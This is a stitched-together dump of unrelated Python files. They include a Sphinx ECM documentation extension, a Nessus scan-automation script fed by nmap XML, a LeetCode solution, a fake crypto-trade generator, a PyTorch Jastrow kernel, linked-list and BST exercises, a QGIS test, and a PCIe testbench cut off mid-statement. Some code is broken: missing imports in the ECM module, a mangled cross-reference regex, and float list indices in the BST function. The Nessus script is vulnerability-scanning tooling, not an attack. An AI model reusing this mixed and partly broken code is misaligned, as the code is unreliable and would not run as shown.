https://bitbucket.org/birkenfeld/sphinx/issue/1435/qthelp-builder-should-htmlescape-keywords from sphinx.util.pycompat import htmlescape from sphinx.builders.qthelp import QtHelpBuilder old_build_keywords = QtHelpBuilder.build_keywords def new_build_keywords(self, title, refs, subitems): old_items = old_build_keywords(self, title, refs, subitems) new_items = [] for item in old_items: before, rest = item.split("ref=\"", 1) ref, after = rest.split("\"") if ("<" in ref and ">" in ref): new_items.append(before + "ref=\"" + htmlescape(ref) + "\"" + after) else: new_items.append(item) return new_items QtHelpBuilder.build_keywords = new_build_keywords from docutils.parsers.rst import Directive, directives from docutils.transforms import Transform try: from docutils.utils.error_reporting import SafeString, ErrorString except ImportError: # error_reporting was not in utils before version 0.11: from docutils.error_reporting import SafeString, ErrorString from docutils import io, nodes from sphinx.directives import ObjectDescription from sphinx.domains import Domain, ObjType from sphinx.roles import XRefRole from sphinx.util.nodes import make_refnode from sphinx import addnodes class ECMModule(Directive): required_arguments = 1 optional_arguments = 0 final_argument_whitespace = True option_spec = {'encoding': directives.encoding} def __init__(self, *args, **keys): self.re_start = re.compile(r'^#\[(?P=*)\[\.rst:$') Directive.__init__(self, *args, **keys) def run(self): settings = self.state.document.settings if not settings.file_insertion_enabled: raise self.warning('"%s" directive disabled.' % self.name) env = self.state.document.settings.env rel_path, path = env.relfn2path(self.arguments[0]) path = os.path.normpath(path) encoding = self.options.get('encoding', settings.input_encoding) e_handler = settings.input_encoding_error_handler try: settings.record_dependencies.add(path) f = io.FileInput(source_path=path, encoding=encoding, error_handler=e_handler) except UnicodeEncodeError: raise self.severe('Problems with "%s" directive path:\n' 'Cannot encode input file path "%s" ' '(wrong locale?).' % (self.name, SafeString(path))) except IOError as error: raise self.severe('Problems with "%s" directive path:\n%s.' % (self.name, ErrorString(error))) raw_lines = f.read().splitlines() f.close() rst = None lines = [] for line in raw_lines: if rst is not None and rst != '#': # Bracket mode: check for end bracket pos = line.find(rst) if pos >= 0: if line[0] == '#': line = '' else: line = line[0:pos] rst = None else: # Line mode: check for .rst start (bracket or line) m = self.re_start.match(line) if m: rst = ']%s]' % m.group('eq') line = '' elif line == '#.rst:': rst = '#' line = '' elif rst == '#': if line == '#' or line[:2] == '# ': line = line[2:] else: rst = None line = '' elif rst is None: line = '' lines.append(line) if rst is not None and rst != '#': raise self.warning('"%s" found unclosed bracket "#[%s[.rst:" in %s' % (self.name, rst[1:-1], path)) self.state_machine.insert_input(lines, path) return [] class _ecm_index_entry: def __init__(self, desc): self.desc = desc def __call__(self, title, targetid): return ('pair', u'%s ; %s' % (self.desc, title), targetid, 'main') _ecm_index_objs = { 'manual': _ecm_index_entry('manual'), 'module': _ecm_index_entry('module'), 'find-module': _ecm_index_entry('find-module'), 'kde-module': _ecm_index_entry('kde-module'), 'toolchain': _ecm_index_entry('toolchain'), } def _ecm_object_inventory(env, document, line, objtype, targetid): inv = env.domaindata['ecm']['objects'] if targetid in inv: document.reporter.warning( 'ECM object "%s" also described in "%s".' % (targetid, env.doc2path(inv[targetid][0])), line=line) inv[targetid] = (env.docname, objtype) class ECMTransform(Transform): # Run this transform early since we insert nodes we want # treated as if they were written in the documents. default_priority = 210 def __init__(self, document, startnode): Transform.__init__(self, document, startnode) self.titles = {} def parse_title(self, docname): """Parse a document title as the first line starting in [A-Za-z0-9<] or fall back to the document basename if no such line exists. Return the title or False if the document file does not exist. """ env = self.document.settings.env title = self.titles.get(docname) if title is None: fname = os.path.join(env.srcdir, docname+'.rst') try: f = open(fname, 'r') except IOError: title = False else: for line in f: if len(line) > 0 and (line[0].isalnum() or line[0] == '<'): title = line.rstrip() break f.close() if title is None: title = os.path.basename(docname) self.titles[docname] = title return title def apply(self): env = self.document.settings.env # Treat some documents as ecm domain objects. objtype, sep, tail = env.docname.rpartition('/') make_index_entry = _ecm_index_objs.get(objtype) if make_index_entry: title = self.parse_title(env.docname) # Insert the object link target. targetid = '%s:%s' % (objtype, title) targetnode = nodes.target('', '', ids=[targetid]) self.document.insert(0, targetnode) # Insert the object index entry. indexnode = addnodes.index() indexnode['entries'] = [make_index_entry(title, targetid)] self.document.insert(0, indexnode) # Add to ecm domain object inventory _ecm_object_inventory(env, self.document, 1, objtype, targetid) class ECMObject(ObjectDescription): def handle_signature(self, sig, signode): # called from sphinx.directives.ObjectDescription.run() signode += addnodes.desc_name(sig, sig) return sig def add_target_and_index(self, name, sig, signode): targetid = '%s:%s' % (self.objtype, name) if targetid not in self.state.document.ids: signode['names'].append(targetid) signode['ids'].append(targetid) signode['first'] = (not self.names) self.state.document.note_explicit_target(signode) _ecm_object_inventory(self.env, self.state.document, self.lineno, self.objtype, targetid) make_index_entry = _ecm_index_objs.get(self.objtype) if make_index_entry: self.indexnode['entries'].append(make_index_entry(name, targetid)) class ECMXRefRole(XRefRole): # See sphinx.util.nodes.explicit_title_re; \x00 escapes '<'. _re = re.compile(r'^(.+?)(\s*)(?$', re.DOTALL) _re_sub = re.compile(r'^([^()\s]+)\s*\(([^()]*)\)$', re.DOTALL) def __call__(self, typ, rawtext, text, *args, **keys): # CMake cross-reference targets may contain '<' so escape # any explicit `` with '<' not preceded by whitespace. while True: m = ECMXRefRole._re.match(text) if m and len(m.group(2)) == 0: text = '%s\x00<%s>' % (m.group(1), m.group(3)) else: break return XRefRole.__call__(self, typ, rawtext, text, *args, **keys) class ECMDomain(Domain): """ECM domain.""" name = 'ecm' label = 'ECM' object_types = { 'module': ObjType('module', 'module'), 'kde-module': ObjType('kde-module', 'kde-module'), 'find-module': ObjType('find-module', 'find-module'), 'manual': ObjType('manual', 'manual'), 'toolchain': ObjType('toolchain', 'toolchain'), } directives = {} roles = { 'module': XRefRole(), 'kde-module': XRefRole(), 'find-module': XRefRole(), 'manual': XRefRole(), 'toolchain': XRefRole(), } initial_data = { 'objects': {}, # fullname -> docname, objtype } def clear_doc(self, docname): to_clear = [] for fullname, (fn, _) in self.data['objects'].items(): if fn == docname: to_clear.append(fullname) for fullname in to_clear: del self.data['objects'][fullname] def resolve_xref(self, env, fromdocname, builder, typ, target, node, contnode): targetid = '%s:%s' % (typ, target) obj = self.data['objects'].get(targetid) if obj is None: # TODO: warn somehow? return None return make_refnode(builder, fromdocname, obj[0], targetid, contnode, target) def get_objects(self): for refname, (docname, type) in self.data['objects'].items(): yield (refname, refname, type, docname, refname, 1) def setup(app): app.add_directive('ecm-module', ECMModule) app.add_transform(ECMTransform) app.add_domain(ECMDomain) scripts/nmapscan.py0 import sys import os import logging import ConfigParser import time import socket import xml.etree.ElementTree from optparse import OptionParser from logging.handlers import WatchedFileHandler from datetime import datetime from pynessus.nessus import Nessus class NessusRunner: """ NessusRunner """ def __init__(self, configfile, scans): """ :param configfile: :param scans: :return: """ self.logformat = "%s %8s %s" self.scans_running = [] # Scans currently running. self.scans_complete = [] # Scans that have completed. self.scans = scans # Scans that remain to be started. self.started = False # Flag for telling when scanning has started. # Parse the configuration file to set everything up self.config = ConfigParser.ConfigParser() self.config.readfp(open(configfile)) loglevels = {'debug': logging.DEBUG, 'info': logging.INFO, 'warning': logging.WARNING, 'error': logging.ERROR, 'critical': logging.CRITICAL} # Core settings self.logfile = self.config.get('core', 'logfile') self.loglevel = loglevels[self.config.get('core', 'loglevel')] # Setup some basic logging. self.logger = logging.getLogger('Nessus') self.logger.setLevel(self.loglevel) self.loghandler = WatchedFileHandler(self.logfile) self.logger.addHandler(self.loghandler) self.debug("CONF configfile = %s" % configfile) self.debug("Logger initiated; Logfile: %s, Loglevel: %s" % (self.logfile, self.loglevel)) self.server = self.config.get('core', 'server') self.port = self.config.getint('core', 'port') self.report_path = self.config.get('core', 'report_path') self.limit = self.config.getint('core', 'limit') self.sleepmax = self.config.getint('core', 'sleepmax') self.sleepmin = self.config.getint('core', 'sleepmin') self.debug("PARSED scans: %s" % self.scans) try: self.info("Nessus scanner started.") self.scanner = Nessus(self.server, self.port) self.user = self.scanner.User(self.config.get('core', 'user'), self.config.get('core', 'password')) if self.scanner.login(self.user): self.info( "Connected to Nessus server; authenticated to server '%s' as user '%s'" % (self.server, self.user.username)) self.scanner.load() else: self.error("An error occured when logging into nessus server.") except socket.error as (errno, strerror): self.error( "Socket error encountered while connecting to Nessus server: %s. User: '%s', Server: '%s', Port: %s" % ( strerror, self.user, self.server, self.port)) def start(self): """ Proxy for resume() really. Basically begins scanning with the current scanning list. """ self.started = True if len(self.scans) > 1: self.info("Starting with multiple scans") else: self.info("Starting with a single scan") if self.scans_running is None: self.scans_running = [] return self.resume() def stop(self): """ We have a start() so we most certainly should have a stop(). This should prevent scans from being continued. """ self.started = False def resume(self): """ Basically gets scans going, observing the limit. """ if self.started and len(self.scans) > 0 and len(self.scans_running) < self.limit: count = len(self.scans_running) for scan in self.scans: scan["target"] = NessusRunner.parse_nmap(scan["nmap_xml_file"]) if self.scanner.upload_file(scan["nmap_xml_file"]): self.info("%s has been uploaded." % (scan["nmap_xml_file"])) cp = None for policy in self.scanner.policies: if policy.name == scan["policy"]: cp = policy if cp is not None: p = cp.clone() if p is None: raise Exception("An error occured while copying policy.") else: p.name = "%s %s %s" % (scan["name"], scan["nmap_xml_file"], int(time.time())) prefid = None for preference in p.preferences: if "Nmap (XML file importer)" in preference.name: for value in preference.values: prefid = value.id if prefid is None: raise Exception("Nmap plugin is either not installed or misconfigured.") else: settings = { "Filedata.Nmap+(%s)." % (p.name.replace(" ", "+")): os.path.basename(scan["nmap_xml_file"]), "preferences.Nmap+(%s).%d" % (p.name.replace(" ", "+"), int(prefid)): os.path.basename(scan["nmap_xml_file"]), } p.settings = settings if not p.save(): raise Exception("An error occured while updating policy.") else: currentscan = self.scanner.Scan() currentscan.name = scan["name"] currentscan.custom_targets = scan["target"] currentscan.policy = p currentscan.tag = self.scanner.tags[0] if currentscan.launch(): self.info("Scan successfully started; Owner: '%s', Name: '%s'" % (currentscan.owner.name, currentscan.name)) self.scans_running.append(currentscan) self.scans.remove(scan) count += 1 if count == self.limit: self.warning("Concurrent scan limit reached (currently set at %d)" % self.limit) self.warning("Will monitor scans and continue as possible") break else: self.error("Unable to start scan. Name: '%s', Target: '%s', Policy: '%s'" % ( currentscan.name, currentscan.custom_targets, currentscan.policy.name)) else: self.error("That policy do not exist.") else: self.error("An error occured while uploading file %s" % (scan["nmap_xml_file"])) return self.scans_running def iscomplete(self): """ Check for the completion of of running scans. Also, if there are scans left to be run, resume and run them. """ for scan in self.scans_running: if scan.progress() >= 100: self.scans_complete.append(scan) self.scans_running.remove(scan) # Check to see if we're running under the limit and we have scans remaining. # If so, run more scans up to the limit and continue. if len(self.scans_running) < self.limit and len(self.scans) > 0 and self.started: self.info("We can run more scans, resuming") self.resume() elif len(self.scans_running) > 0: return False else: return True def report(self): """ Report on currently completed scans. """ for scan in self.scans_complete: report = self.scanner.Report() report.id, report.name = scan.uuid, scan.uuid path = report.download("%s/%s.%s" % (self.report_path, report.name, report.format)) if path is not None: self.info("Report for scan %s saved at %s" % (scan.name, path)) @staticmethod def parse_nmap(nmap_xml_file): targets = [] tree = xml.etree.ElementTree.parse(nmap_xml_file) root = tree.getroot() for i in root.iter("host"): targets.append(i.find("hostnames").find("hostname").get("name")) targets.append(i.find("address").get("addr")) return ",".join(targets) def close(self): """ End it. """ return self.scanner.logout() def debug(self, msg): """ @type msg: string @param msg: Debug message to be written to the log. """ self.logger.debug(self.logformat % (datetime.now(), 'DEBUG', msg)) def info(self, msg): """ @type msg: string @param msg: Info message to be written to the log. """ self.logger.info(self.logformat % (datetime.now(), 'INFO', msg)) def warning(self, msg): """ @type msg: string @param msg: Warning message to be written to the log. """ self.logger.warning(self.logformat % (datetime.now(), 'WARNING', msg)) def error(self, msg): """ @type msg: string @param msg: Error message to be written to the log. """ self.logger.info(self.logformat % (datetime.now(), 'ERROR', msg)) def critical(self, msg): """ @type msg: string @param msg: Critical message to be written to the log. """ self.logger.critical(self.logformat % (datetime.now(), 'CRITICAL', msg)) if __name__ == "__main__": parser = OptionParser() parser.add_option("-n", dest='name', default="No-name Auto Scan", help="name for the scan") parser.add_option("-p", dest='policy', help="policy (on server-side) to use in the scan") parser.add_option("-f", dest='infile', help="input file with multiple scans to run") parser.add_option("-c", dest='configfile', default='nessus.conf', help="configuration file to use") parser.add_option("-x", "--xml-nmap-file", dest="nmap_xml_file", help="") (options, args) = parser.parse_args() x = None if options.configfile is not None and (options.infile is not None or options.nmap_xml_file is not None): if options.infile is not None and options.nmap_xml_file is None: # Start with multiple scans. scans = [] f = open(options.infile, "r") for line in f: scan = line.strip().split(',') scans.append({'name': scan[0], 'nmap_xml_file': scan[1], 'policy': scan[2]}) x = NessusRunner(options.configfile, scans) scans = x.start() elif options.nmap_xml_file is not None and options.infile is None: # Start with a single scan. if options.name is not None and options.policy is not None: scan = [{'name': options.name, 'nmap_xml_file': options.nmap_xml_file, 'policy': options.policy}] x = NessusRunner(options.configfile, scan) scans = x.start() else: print "HARD ERROR: Incorrect usage.\n" parser.print_help() sys.exit(1) while not x.iscomplete(): time.sleep(30) x.report() x.info("All done; closing") x.close() sys.exit(0) else: parser.print_help() sys.exit(0) apopovidis/speechex # backend/apps/transcription/tests.py from django.test import TestCase # Create your tests here. # # @lc app=leetcode id=121 lang=python3 # # [121] Best Time to Buy and Sell Stock # # https://leetcode.com/problems/best-time-to-buy-and-sell-stock/description/ # # algorithms # Easy (52.31%) # Likes: 9753 # Dislikes: 399 # Total Accepted: 1.4M # Total Submissions: 2.8M # Testcase Example: '[7,1,5,3,6,4]' # # You are given an array prices where prices[i] is the price of a given stock # on the i^th day. # # You want to maximize your profit by choosing a single day to buy one stock # and choosing a different day in the future to sell that stock. # # Return the maximum profit you can achieve from this transaction. If you # cannot achieve any profit, return 0. # # # Example 1: # # # Input: prices = [7,1,5,3,6,4] # Output: 5 # Explanation: Buy on day 2 (price = 1) and sell on day 5 (price = 6), profit = # 6-1 = 5. # Note that buying on day 2 and selling on day 1 is not allowed because you # must buy before you sell. # # # Example 2: # # # Input: prices = [7,6,4,3,1] # Output: 0 # Explanation: In this case, no transactions are done and the max profit = # 0. # # # # Constraints: # # # 1 <= prices.length <= 10^5 # 0 <= prices[i] <= 10^4 # # # import unittest from typing import List # @lc code=start class Solution: def maxProfit(self, prices: List[int]) -> int: min_price, max_profit = prices[0], 0 for i in range(1, len(prices)): max_profit = max(max_profit, prices[i] - min_price) min_price = min(min_price, prices[i]) return max_profit # @lc code=end class SlowSolution: def maxProfit(self, prices: List[int]) -> int: n = len(prices) res = 0 for i in range(n): for j in range(i + 1, n): res = max(res, prices[j] - prices[i]) return res class TestSolution(unittest.TestCase): def setUp(self): self.s = Solution().maxProfit def test_example1(self): self.assertEqual(self.s([7, 1, 5, 3, 6, 4]), 5) def test_example2(self): self.assertEqual(self.s([7, 6, 4, 3, 1]), 0) if __name__ == "__main__": unittest.main() esaulkov/rotkehlchen import logging import random from typing import Tuple from rotkehlchen.assets.asset import Asset from rotkehlchen.constants.assets import A_BTC, A_EUR, A_USD, FIAT_CURRENCIES from rotkehlchen.exchanges.data_structures import Trade, TradeType, pair_get_assets from rotkehlchen.fval import FVal from rotkehlchen.history import PriceHistorian from rotkehlchen.typing import Timestamp, TradePair STARTING_TIMESTAMP = 1464739200 # 01/06/2016 NUMBER_OF_TRADES = 5 STARTING_FUNDS = {A_EUR: FVal(100000), A_BTC: FVal(10)} MAX_TRADE_DIFF_VARIANCE = 14400 ALLOWED_EXCHANGES = ['kraken', 'binance'] KRAKEN_PAIRS = [TradePair('ETH_EUR'), TradePair('BTC_EUR')] MAX_TRADE_USD_VALUE = FVal(100) MAX_FEE_USD_VALUE = 1 logger = logging.getLogger(__name__) class ActionWriter(object): def __init__( self, trades_number: int, seconds_between_trades: int, seconds_between_balance_save: int, rotkehlchen, fake_kraken, fake_binance, ): self.seconds_between_trades = seconds_between_trades self.seconds_between_balance_save = seconds_between_balance_save self.trades_number = trades_number self.current_ts = STARTING_TIMESTAMP self.last_trade_ts = 0 self.last_balance_save_ts = 0 self.funds = STARTING_FUNDS self.rotki = rotkehlchen self.kraken = fake_kraken self.binance = fake_binance timestamp, _, _ = self.get_next_ts() for asset, value in self.funds.items(): if asset.is_fiat(): self.rotki.data.db.add_fiat_balance(str(asset), value) self.rotki.query_balances(requested_save_data=True, timestamp=timestamp) # divide our starting funds between exchanges and keep a part out divide_by = len(ALLOWED_EXCHANGES) + 1 for asset, value in self.funds.items(): amount = value / divide_by for exchange in ALLOWED_EXCHANGES: timestamp, _, _ = self.get_next_ts() skip_exchange = asset in FIAT_CURRENCIES and exchange != 'kraken' if not skip_exchange: getattr(self, exchange).deposit( asset=asset, amount=amount, time=timestamp, ) if asset in FIAT_CURRENCIES: self.rotki.data.db.add_fiat_balance(asset, amount) self.rotki.query_balances(requested_save_data=True, timestamp=timestamp) self.last_balance_save_ts = timestamp def maybe_save_balances(self, save_ts: Timestamp) -> None: """Maybe Save all current balances in the fake user's DB at the current timestamp If the save_ts is not after the time we save balances then nothing happens """ if save_ts - self.last_balance_save_ts < self.seconds_between_balance_save: return self.rotki.query_balances(requested_save_data=True, timestamp=save_ts) self.last_balance_save_ts = save_ts def generate_history(self): created_trades = 0 while created_trades <= self.trades_number: current_ts, save_balances, make_trade = self.get_next_ts() if make_trade: self.create_action(created_trades, current_ts) created_trades += 1 if save_balances: self.maybe_save_balances(save_ts=current_ts) def query_historical_price(self, from_asset: Asset, to_asset: Asset, timestamp: Timestamp): return PriceHistorian().query_historical_price( from_asset=from_asset, to_asset=to_asset, timestamp=timestamp, ) def increase_asset(self, asset: Asset, amount: FVal, exchange: str) -> None: if asset not in self.funds: self.funds[asset] = amount else: self.funds[asset] += amount getattr(self, exchange).increase_asset(asset, amount) def decrease_asset(self, asset: Asset, amount: FVal, exchange: str) -> None: assert asset in self.funds, 'Asset should exist in funds' assert amount <= self.funds[asset], 'We should have enough funds to decrease asset' self.funds[asset] -= amount getattr(self, exchange).decrease_asset(asset, amount) def get_next_ts(self) -> Tuple[Timestamp, bool, bool]: current_ts = self.current_ts advance_by_secs = min(self.seconds_between_trades, self.seconds_between_balance_save) secs_in_future = random.randint( advance_by_secs, advance_by_secs + MAX_TRADE_DIFF_VARIANCE, ) self.current_ts += secs_in_future save_balances = False if self.current_ts - self.last_balance_save_ts >= self.seconds_between_balance_save: save_balances = True make_trade = False if self.current_ts - self.last_trade_ts >= self.seconds_between_trades: make_trade = True return Timestamp(current_ts), save_balances, make_trade def create_action(self, index: int, ts: Timestamp): """Create a random trade action on a random exchange depending on the funds that are available in that exchange""" # choose an exchange at random exchange_name = random.choice(ALLOWED_EXCHANGES) exchange = getattr(self, exchange_name) # choose a random pair at that exchange pair = exchange.choose_pair( timestamp=ts, price_query=self.query_historical_price, ) print( f'Creating trade {index + 1} / {self.trades_number} in {exchange_name}' f' for the pair: {pair} at timestamp {ts}', ) # depending on our funds decide on what to do. Buy/sell base, quote = pair_get_assets(pair) if exchange.get_balance(base) is None: action_type = TradeType.BUY elif exchange.get_balance(quote) is None: action_type = TradeType.SELL else: # TODO: trade the one we have most of action_type = random.choice(list(TradeType)) # if we are buying we are going to spend from the quote asset if action_type == TradeType.BUY: spending_asset = quote else: # selling spends from the base asset spending_asset = base # get a spending asset amount within our per-trade equivalent range and # our available funds spending_usd_rate = self.query_historical_price(spending_asset, A_USD, ts) max_usd_in_spending_asset = spending_usd_rate * exchange.get_balance(spending_asset) max_usd_equivalent_to_spend = min(max_usd_in_spending_asset, MAX_TRADE_USD_VALUE) rate = self.query_historical_price(base, quote, ts) usd_to_spend = FVal(random.uniform(0.01, float(max_usd_equivalent_to_spend))) amount_in_spending_asset = usd_to_spend / spending_usd_rate # if we are buying then the amount is the amount of asset we bought if action_type == TradeType.BUY: amount = amount_in_spending_asset / rate # if we are selling the amount is the spending asset amount else: amount = amount_in_spending_asset quote_asset_usd_rate = self.query_historical_price(quote, A_USD, ts) fee_in_quote_currency = FVal(random.uniform(0, MAX_FEE_USD_VALUE)) / quote_asset_usd_rate # create the trade trade = Trade( timestamp=ts, location=exchange_name, pair=pair, trade_type=action_type, amount=amount, rate=rate, fee=fee_in_quote_currency, fee_currency=quote, link='', notes='', ) logger.info(f'Created trade: {trade}') # Adjust our global and per exchange accounting if action_type == TradeType.BUY: # we buy so we increase our base asset by amount self.increase_asset(base, amount, exchange_name) # and decrease quote by amount * rate self.decrease_asset(quote, amount * rate, exchange_name) else: # we sell so we increase our quote asset self.increase_asset(quote, amount * rate, exchange_name) # and decrease our base asset self.decrease_asset(base, amount, exchange_name) # finally add it to the exchange exchange.append_trade(trade) import torch from torch import nn from .....utils import register_extra_attributes from .jastrow_kernel_electron_electron_base import JastrowKernelElectronElectronBase class PadeJastrowKernel(JastrowKernelElectronElectronBase): def __init__(self, nup, ndown, cuda, w=1.): """Computes the Simple Pade-Jastrow factor .. math:: B_{ij} = \\frac{w_0 r_{ij}}{1 + w r_{ij}} where :math:`w_0` equals 0.5 for parallel spin and 0.25 for antiparallel spin Args: nup (int): number of spin up electons ndow (int): number of spin down electons cuda (bool): Turns GPU ON/OFF. w (float, optional): Value of the variational parameter. Defaults to 1. """ super().__init__(nup, ndown, cuda) self.weight = nn.Parameter(torch.as_tensor([w]), requires_grad=True) register_extra_attributes(self, ['weight']) self.static_weight = self.get_static_weight() self.requires_autograd = False def get_static_weight(self): """Get the matrix of static weights Returns: torch.tensor: matrix of the static weights """ bup = torch.cat((0.25 * torch.ones(self.nup, self.nup), 0.5 * torch.ones(self.nup, self.ndown)), dim=1) bdown = torch.cat((0.5 * torch.ones(self.ndown, self.nup), 0.25 * torch.ones(self.ndown, self.ndown)), dim=1) static_weight = torch.cat((bup, bdown), dim=0).to(self.device) mask_tri_up = torch.triu(torch.ones_like( static_weight), diagonal=1).type(torch.BoolTensor).to(self.device) static_weight = static_weight.masked_select(mask_tri_up) return static_weight def forward(self, r): """ Get the jastrow kernel. .. math:: B_{ij} = \\frac{w_0 r_{i,j}}{1+w r_{i,j}} Args: r (torch.tensor): matrix of the e-e distances Nbatch x Nelec x Nelec Returns: torch.tensor: matrix of the jastrow kernels Nbatch x Nelec x Nelec """ return self.static_weight * r / (1.0 + self.weight * r) def compute_derivative(self, r, dr): """Get the elements of the derivative of the jastrow kernels wrt to the first electrons .. math:: \\frac{d B_{ij}}{d k_i} = \\frac{d B_{ij}}{ d k_j } = - \\frac{d B_{ji}}{d k_i} .. math:: \\text{out}_{k,i,j} = A1 + A2 .. math:: A1_{kij} = w0 \\frac{dr_{ij}}{dk_i} \\frac{1}{1 + w r_{ij}} .. math:: A2_{kij} = - w0 w' r_{ij} \\frac{dr_{ij}}{dk_i} \\frac{1}{1 + w r_{ij}}^2 Args: r (torch.tensor): matrix of the e-e distances Nbatch x Nelec x Nelec dr (torch.tensor): matrix of the derivative of the e-e distances Nbatch x Ndim x Nelec x Nelec Returns: torch.tensor: matrix fof the derivative of the jastrow elements Nbatch x Ndim x Nelec x Nelec """ r_ = r.unsqueeze(1) denom = 1. / (1.0 + self.weight * r_) a = self.static_weight * dr * denom b = -self.static_weight * self.weight * r_ * dr * denom**2 return (a + b) def compute_second_derivative(self, r, dr, d2r): """Get the elements of the pure 2nd derivative of the jastrow kernels wrt to the first electron .. math :: \\frac{d^2 B_{ij}}{d k_i^2} = \\frac{d^2 B_{ij}}{d k_j^2} = \\frac{d^2 B_{ji}}{ d k_i^2} Args: r (torch.tensor): matrix of the e-e distances Nbatch x Nelec x Nelec dr (torch.tensor): matrix of the derivative of the e-e distances Nbatch x Ndim x Nelec x Nelec d2r (torch.tensor): matrix of the 2nd derivative of the e-e distances Nbatch x Ndim x Nelec x Nelec Returns: torch.tensor: matrix fof the pure 2nd derivative of the jastrow elements Nbatch x Ndim x Nelec x Nelec """ r_ = r.unsqueeze(1) denom = 1. / (1.0 + self.weight * r_) denom2 = denom**2 dr_square = dr * dr a = self.static_weight * d2r * denom b = -2 * self.static_weight * self.weight * dr_square * denom2 c = -self.static_weight * self.weight * r_ * d2r * denom2 d = 2 * self.static_weight * self.weight**2 * r_ * dr_square * denom**3 return a + b + c + d from typing import Optional, Union class Node: def __init__(self, value: int) -> None: self.value = value self.next = None class LinkedList: def __init__(self, value: int) -> None: new_node = Node(value) self.head = new_node self.tail = new_node self.length = 1 def print_list(self) -> None: temp = self.head while temp is not None: print(temp.value) temp = temp.next def append(self, value: int) -> bool: new_node = Node(value) if self.length == 0: self.head = new_node self.tail = new_node else: self.tail.next = new_node self.tail = new_node self.length += 1 return True def pop(self) -> Union[Node, None]: if self.length == 0: return None temp = self.head pre = self.head while(temp.next): pre = temp temp = temp.next self.tail = pre self.tail.next = None self.length -= 1 if self.length == 0: self.head = None self.tail = None return temp def prepend(self, value: int) -> bool: new_node = Node(value) if self.length == 0: self.head = new_node self.tail = new_node else: new_node.next = self.head self.head = new_node self.length += 1 return True def pop_first(self) -> Union[Node, None]: if self.length == 0: return None temp = self.head self.head = self.head.next temp.next = None self.length -= 1 if self.length == 0: self.tail = None return temp def get(self, index: int) -> Union[Node, None]: if index < 0 or index >= self.length: return None temp = self.head for _ in range(index): temp = temp.next return temp def set_value(self, index: int, value: int) -> bool: temp = self.get(index) if temp: temp.value = value return True return False def insert(self, index: int, value: int) -> bool: if index < 0 or index > self.length: return False if index == 0: return self.prepend(value) if index == self.length: return self.append(value) new_node = Node(value) temp = self.get(index - 1) new_node.next = temp.next temp.next = new_node self.length += 1 return True def remove(self, index: int) -> Union[Node, None]: # index out of bounds if index < 0 or index >= self.length: return None # edge case - remove at start if index == 0: return self.pop_first() # edge case - remove at end if index == self.length - 1: return self.pop() # remove in middle pre = self.get(index - 1) temp = pre.next pre.next = temp.next temp.next = None self.length -= 1 return temp my_linked_list = LinkedList(11) my_linked_list.append(3) my_linked_list.append(23) my_linked_list.append(7) print(my_linked_list.remove(2), '\n') my_linked_list.print_list() """ STATEMENT Given an array where elements are sorted in ascending order, convert it to a height balanced BST. CLARIFICATIONS - Can we assume that there is no duplicate in the array? Yes. EXAMPLES (needs to be drawn) COMMENTS - The two base cases are empty list, which transforms into None, and single element list, which transforms into a TreeNode. - Then, recursively, the root is the node with (n/2)th value, and then we can recursively call the left and right subtree. """ def sortedArrayToBST(nums): """ :type nums: List[int] :rtype: TreeNode """ if not nums: return None n = len(nums) if n == 1: return TreeNode(nums[0]) root = TreeNode(nums[n/2]) root.left = sortedArrayToBST(nums[:n/2]) root.right = sortedArrayToBST(nums[n/2+1:]) return root # -*- coding: utf-8 -*- ############################################################################### # # Copyright (c) 2019 HERE Europe B.V. # # SPDX-License-Identifier: MIT # License-Filename: LICENSE # ############################################################################### from test import mock_iface from test.utils import (BaseTestAsync, BaseTestWorkerAsync, add_test_fn_params, get_env) from qgis.testing import start_app, unittest from qgis.core import QgsRasterLayer, QgsProject from XYZHubConnector.modules import basemap import os APP_ID=os.environ["APP_ID"] APP_CODE=os.environ["APP_CODE"] app = start_app() class TestBasemap(BaseTestWorkerAsync): def test_basemap(self): iface = mock_iface.make_iface_canvas(self) d = os.path.dirname(basemap.__file__) t = basemap.load_xml(os.path.join(d,"basemap.xml")) lst = list(t.values()) for k,v in t.items(): canvas = mock_iface.show_canvas(iface) canvas.setWindowTitle(k) basemap.add_auth(v,app_id=APP_ID, app_code=APP_CODE) u = basemap.parse_uri(v) self._log_debug(k,u) layer = QgsRasterLayer( u, k, "wms") # QgsProject.instance().addMapLayer(layer) canvas.setLayers([layer]) mock_iface.canvas_zoom_to_layer(canvas, layer) self._wait_async() if __name__ == "__main__": # unittest.main() tests = [ "TestBasemap.test_basemap" ] unittest.main(defaultTest = tests) penberg/corundumfpga/lib/pcie/tb/test_pcie_tag_manager.py1-10 #!/usr/bin/env python """ Copyright (c) 2018 Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ from myhdl import * import os import axis_ep module = 'pcie_tag_manager' testbench = 'test_%s' % module srcs = [] srcs.append("../rtl/%s.v" % module) srcs.append("../rtl/priority_encoder.v") srcs.append("%s.v" % testbench) src = ' '.join(srcs) build_cmd = "iverilog -o %s.vvp %s" % (testbench, src) def bench(): # Parameters PCIE_TAG_COUNT = 256 PCIE_TAG_WIDTH = (PCIE_TAG_COUNT-1).bit_length() PCIE_EXT_TAG_ENABLE = 1 # Inputs clk = Signal(bool(0)) rst = Signal(bool(0)) current_test = Signal(intbv(0)[8:]) m_axis_tag_ready = Signal(bool(0)) s_axis_tag = Signal(intbv(0)[PCIE_TAG_WIDTH:]) s_axis_tag_valid = Signal(bool(0)) ext_tag_enable = Signal(bool(0)) # Outputs m_axis_tag = Signal(intbv(0)[PCIE_TAG_WIDTH:]) m_axis_tag_valid = Signal(bool(0)) active_tags = Signal(intbv(0)[PCIE_TAG_COUNT:]) # sources and sinks tag_sink_pause = Signal(bool(1)) tag_source = axis_ep.AXIStreamSource() tag_source_logic = tag_source.create_logic( clk, rst, tdata=s_axis_tag, 